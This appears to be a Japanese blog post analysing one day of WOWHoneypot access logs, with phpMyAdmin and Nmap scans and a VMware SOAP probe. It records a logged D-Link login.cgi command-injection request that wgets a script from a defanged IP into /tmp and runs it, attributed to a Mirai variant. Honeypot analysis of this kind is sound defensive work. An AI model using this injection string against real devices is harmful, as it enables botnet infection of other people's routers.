WOWHoneypotの簡易分析(39日目)
WOWhoneypotの2018/07/12(木) (運用39日目)の簡易分析です。
本日の総アクセス件数は 70件です。以下が全アクセスログです。
44 2018-07-12 GET /
10 2018-07-12 GET /manager/html
3 2018-07-12 HEAD /
1 2018-07-12 POST /sdk
1 2018-07-12 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-12 GET /pma/scripts/setup.php
1 2018-07-12 GET /phpMyAdmin/scripts/setup.php
1 2018-07-12 GET /phpmyadmin/scripts/setup.php
1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /MyAdmin/scripts/setup.php
1 2018-07-12 GET /myadmin/scripts/setup.php
1 2018-07-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about
phpMyAdmin関連と/を除外したアクセス数です。
10 2018-07-12 GET /manager/html
1 2018-07-12 POST /sdk
1 2018-07-12 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about
本日もZmEuの通信を検知しましたが、phpMyAdminのスキャンでした。
また、POST /sdkという見覚えのない通信が来ていました。
POST /sdk HTTP/1.1
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>sowl@VM-2b77ccc0-3fe1-4c8f-b571-e4e31b394960:
調べてみると、以下にNmapでvmwareのバージョンを調査するスクリプトがあり、これと特徴が一致していました。
nmap/vmware-version.nse at master · nmap/nmap · GitHub
同一の送信元IPからの通信を見ると、他に以下がありました。
1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about
上3つは明らかにNmapですが、他の下2つもUser-Agentが同一で、恐らくは同じアクターによるスキャンと思われます。
なお、一番下については、以下の記事があり、これもNMAPと思われます。
nmap/http-trane-info.nse at master · nmap/nmap · GitHub
本日のハンティングログは以下です。D-Linkの脆弱性をつくMirai亜種Shinoaの通信です。
1 2018-07-12 wget hxxp://185.62.190.191/
以上です。